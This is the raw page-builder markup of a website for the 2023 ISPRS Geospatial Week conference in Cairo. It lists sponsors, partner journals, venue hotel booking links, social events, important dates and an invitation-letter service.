rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> 